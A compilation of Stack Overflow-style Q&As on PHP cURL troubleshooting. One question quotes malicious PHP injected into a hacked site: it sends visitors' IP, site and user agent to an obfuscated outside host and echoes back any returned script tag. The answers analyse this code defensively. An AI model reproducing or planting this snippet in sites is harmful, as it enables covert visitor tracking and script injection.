Alright, so I have cURL installed correctly and am now trying to make a simple call to a URL, but for some reason I'm not seeing anything happen in my database. (The URL being called should make changes to my database; I've verified this by calling the URL directly in my browser.)
This is my code:
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://www.website.com/receive/001/ALKDLDKGJLKSD/ASIODULKJASFL");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
In my terminal I am getting the following response:
´╗┐
Am I just misunderstanding how cURL should be used for a simple web request?
Your code is correct. It retrieves the HTTP page (I've tested it on my terminal).
The three characters you are getting are probably a UTF-8 byte order mark (BOM):
0xEF,0xBB,0xBF
Either that is what the page returns, or those bytes are at the beginning of your PHP script (some editors add them to text files implicitly; the characters won't show in the editor itself).
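If the BOM comes from the response itself, you can strip it before using the body. A minimal sketch (the URL is the placeholder from the question):
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://www.website.com/receive/001/ALKDLDKGJLKSD/ASIODULKJASFL");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // capture the response instead of printing it
$body = curl_exec($ch);
curl_close($ch);
if ($body !== false && substr($body, 0, 3) === "\xEF\xBB\xBF") {
    $body = substr($body, 3); // strip a leading UTF-8 BOM (0xEF 0xBB 0xBF)
}
echo $body;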
Well, I got it working. It turned out there was some security behind the URL I was trying to access; silly me for not checking that properly. Still, many thanks for all the suggestions!
Related
I'm supposed to perform a cURL operation, but the request keeps being sent without any response being returned. While investigating this, I found that the URL string is the problem: I'm supposed to open 'http://api.ikarthick.in', but instead I end up with 'http: //api.ikarthick.in', which has a white space between : and //. Kindly check the code below.
<?php
$url = "http://api.ikarthick.in"; //as it is public in stackoverflow i've truncated the exact url
print($url);
return; // used this return only while investigating the issue, so I could see what's in $url
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL,$url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
$response = curl_exec($curl);
print($response);
?>
For this, the output I see in Postman is as follows:
http: //api.ikarthick.in
Also, when I click //api.ikarthick.in on the Postman response screen, http://localhost//ikarthick.in is opened in a new Postman tab. I tried running the same URL in a web browser and got the expected output.
But the problem is that I can't perform the cURL operation with the above URL. Could anyone help me fix this?
Thanks in advance.
It's probably an invisible whitespace character in the code which your IDE is not good at handling.
Open the source code in a hex editor and remove the whitespace there. If you're on Windows, HxD Hex Editor is an excellent choice; for Linux, Bless Hex Editor is decent.
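Alternatively, you can strip whitespace and zero-width characters from the URL in PHP before handing it to cURL. A rough sketch, assuming the stray character is an ordinary space, a zero-width space, or a BOM:
$url = "http://api.ikarthick.in";
// Remove ordinary whitespace plus zero-width space / BOM characters an editor may have inserted
$url = preg_replace('/[\s\x{200B}\x{FEFF}]+/u', '', $url);

$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
$response = curl_exec($curl);
curl_close($curl);
print($response);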
When I call http_get it never returns; my web page just stops outputting at that point. The destination URL never receives the request.
<?php //simplest test of http_get I could make
print "http://kayaker.net/php/image.php?id=ORCS084144<br>";
http_get ("http://kayaker.net/php/image.php?id=ORCS084144");
print "<br>back from http_get<br>";
?>
The original script was calling http_get in a loop to send data to several other processes on another server.
The loop stops on the first call to http_get. I tried calling flush(); after every line printed, with no joy. I tried setting longer timeouts in the $options parameter to http_get; that didn't help. I tried calling http_request with HTTP_METH_GET in the first argument, and got the same problem.
This kayaker URL is not the original, just a shorter example that still fails. I took one of the original URLs and pasted it into my browser address line, and it worked fine. I pasted some of the original URLs into another scripting language (the llHTTPRequest function in LSL on Open Simulator) and they work fine from there.
I stored the program above at a location where you can run it from your browser and see it fail.
I pasted the URL to the program above into another scripting language and that at least returned an error status (500) and a message "Internal Server Error" which probably just means the test program didn't terminate properly.
I must be doing something very simple stupid and basically wrong.
But what is it?
Problem
You do not seem to have the right package installed (PECL pecl_http >= 0.1.0).
Fatal error: Call to undefined function http_get() in [snip] on line 8
Solution
You can either
install pecl_http as described in the documentation.
use a different function as mentioned in the comments (file_get_contents, curl); see the sketch below.
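For a simple GET, file_get_contents can be enough on its own; a minimal sketch using the URL from the question (requires allow_url_fopen to be enabled):
$url = "http://kayaker.net/php/image.php?id=ORCS084144";
$body = file_get_contents($url); // returns false on failure
if ($body === false) {
    print "request failed";
} else {
    print $body;
}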
Thanks to the comments above and the surprisingly helpful people at my web hosting company, I was able to write the following function:
function http_get($url)
{
$ch = curl_init(); // initialize curl handle
curl_setopt($ch, CURLOPT_URL, $url); // set the URL to fetch
curl_setopt($ch, CURLOPT_FAILONERROR, 1); // fail on HTTP errors (status >= 400)
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); // allow redirects
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // return into a variable
curl_setopt($ch, CURLOPT_TIMEOUT, 3); // times out after 3s
$result = curl_exec($ch); // run the whole process
curl_close($ch);
return($result);
} //http_get
This works for many different URLs but does fail on some servers; I hope that by playing with the options I can get it working there.
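One way to see why it fails on those servers is to log the cURL error message and HTTP status instead of silently returning false. This is only a sketch of how the function above could be extended; the longer timeout and the dropped CURLOPT_FAILONERROR are my own guesses, not part of the original:
function http_get_debug($url)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); // allow redirects
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // return into a variable
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);       // give slow servers more time
    $result = curl_exec($ch);
    if ($result === false) {
        // curl_error() explains timeouts, DNS failures, SSL problems, etc.
        error_log("cURL error: " . curl_error($ch));
    }
    error_log("HTTP status: " . curl_getinfo($ch, CURLINFO_HTTP_CODE));
    curl_close($ch);
    return $result;
}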
Recently a website I have been involved with was hacked, with unauthorised code being placed on a number of pages. I was just wondering if anyone could shed any light on what exactly this code does, and what benefit it would bring to the person who placed it on these pages.
<?php
#31e3cd#
error_reporting(0); ini_set('display_errors',0); $wp_okpbo35639 = #$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_okpbo35639) && !preg_match ('/bot/i', $wp_okpbo35639))){
$wp_okpbo0935639="http://"."html"."-href".".com/href"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_okpbo35639);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_okpbo0935639);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_35639okpbo = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_35639okpbo,1,3) === 'scr' ){ echo $wp_35639okpbo; }
#/31e3cd#
?>
Above is the code, as it appeared on the pages. I have played around with this code and it seems to get user information using:
$_SERVER['HTTP_USER_AGENT']
This is then combined into a URL similar to the one below, with the user information from above appended:
http://html-href.com/href/?ip=::1&referer=localhost&ua=
I know cURL is used to transfer data, but where exactly is this information being sent, and what is its purpose?
The code makes a call to the URL you noted, sending along the user's IP, your site's domain, and the user's user-agent string. It then prints onto your site any code it receives from the cURL request. The code received could be anything: HTML, JavaScript, or any other client-side code. It's probably not server-side code, since there's no eval() running the code received.
It appears to target Internet Explorer, Chrome, and Firefox browsers, but not crawlers/bots.
EDIT: As FDL pointed out in his comment, this appears to print only if it receives a string where the second, third, and fourth characters are scr, meaning it likely only prints to the page if it received a <script> tag.
$_SERVER['HTTP_USER_AGENT'] is used to check what kind of web browser (or crawler) the client requested the resource with. For instance, the snippet preg_match('/Gecko|MSIE/i', $wp_okpbo35639) checks whether the client browser is Firefox (Gecko) or IE (MSIE). But this is not a foolproof way to determine the source browser, as user-agents can easily be changed or spoofed.
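For illustration, a minimal standalone sketch of the same kind of user-agent check (the variable names here are my own, not from the injected code):
$ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
// True for Firefox (Gecko), IE (MSIE) and any browser whose UA contains "like Gecko",
// false for anything that identifies itself as a bot
$isTargetedBrowser = preg_match('/Gecko|MSIE/i', $ua) && !preg_match('/bot/i', $ua);
var_dump($isTargetedBrowser);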
I'm attempting to use PHP's cURL to make a GET request to a server and am having some difficulties doing so. When I make the request through PHP, I get back a 500 error from the external server. However, if I make the request using curl on the command line, or visit the URL in a browser, it succeeds.
I've stripped the PHP down to the bare essentials:
$url = 'http://example.com:8080/path/to/service?cmd=my_command&arg=example2.com';
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_exec($ch);
print_r(curl_getinfo($ch));
curl_close($ch);
As stated this returns a 500 error from example.com. However, if I do the following:
[me#host ~] curl "http://example.com:8080/path/to/service?cmd=my_command&arg=example2.com"
I am returned the expected XML document.
What gives? It's got to be something with the encoding of the URL: if I strip the $url var down to just http://example.com:8080, the PHP cURL request responds with 200. I've tried replacing the & with %26 - that didn't work (nor would I expect it to, as & is valid in the URL there). I've tried doing what the answer to "php curl sending vars using GET wierd results" suggested, but that didn't help either.
What am I missing here? I'm sure that it's something absurdly simple, but it's escaping me.
Thanks!
EDIT: I've just attempted doing this in Python - just to see what happened - and it works fine there:
import urllib2
r = urllib2.urlopen(theURL)
r.read()
It turns out that the API I was accessing required a User-Agent for all requests, but did not provide any information to indicate such.
Is this a common thing? I can't find any other examples of anyone else doing this other than http://developer.github.com/v3/#user-agent-required
I was able to get things working just fine by adding
curl_setopt($ch, CURLOPT_USERAGENT, "Some-Agent/1.0"); // CURLOPT_USERAGENT takes just the value; cURL adds the "User-Agent:" header name itself
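In context, the full request might look like the following sketch (the URL is the placeholder from the question and the agent string is arbitrary):
$url = 'http://example.com:8080/path/to/service?cmd=my_command&arg=example2.com';
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, 'Some-Agent/1.0'); // the API rejects requests without a User-Agent
$response = curl_exec($ch);
curl_close($ch);
print_r($response);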
I have been searching for an answer for 3 days and cannot find one, because I keep running into obstacles.
I need to load a web page (in order to accept a cookie) and then read the source code of the resulting page without hitting it again. The reason for this is that the page is dynamic, so the content will change.
I have tried to do this using an iframe (document.body.innerHTML), but because these pages run on different servers I hit cross-site scripting issues.
I have also tried writing a PHP script using file_get_contents, but this doesn't allow the cookie to be stored locally.
This is driving me crazy... Any suggestion will be helpful! I need to use PHP or JavaScript for this, but any other suggestion would be useful as well.
When you are on the page, document.body.innerHTML will give you the page source.
Edit: I didn't realize you were loading it like that. See this SO question.
It can be done using cURL in PHP.
A rough implementation:
$ch = curl_init('http://www.google.com/');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // return the response instead of printing it
curl_setopt($ch, CURLOPT_HEADER, 1); // include the response headers in the output
$data = curl_exec($ch);
preg_match('/^Set-Cookie: (.*?);/m', $data, $cookies); // pull the first Set-Cookie header out of the raw response
var_dump($cookies);
var_dump($data);
$data will contain the entire response, so we need to parse out the cookie headers ourselves.
If available on your system, HttpRequest would make this easier.
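Another option, if you want cURL itself to keep the cookie and send it back on the next request, is a cookie jar. A rough sketch (the file path is just an example and must be writable by PHP):
$cookieFile = '/tmp/cookies.txt';

// First request: any Set-Cookie headers are written to the jar when the handle is closed
$ch = curl_init('http://www.google.com/');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookieFile);
curl_exec($ch);
curl_close($ch);

// Second request: the stored cookies are read from the file and sent back automatically
$ch = curl_init('http://www.google.com/');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookieFile);
$page = curl_exec($ch);
curl_close($ch);
var_dump($page);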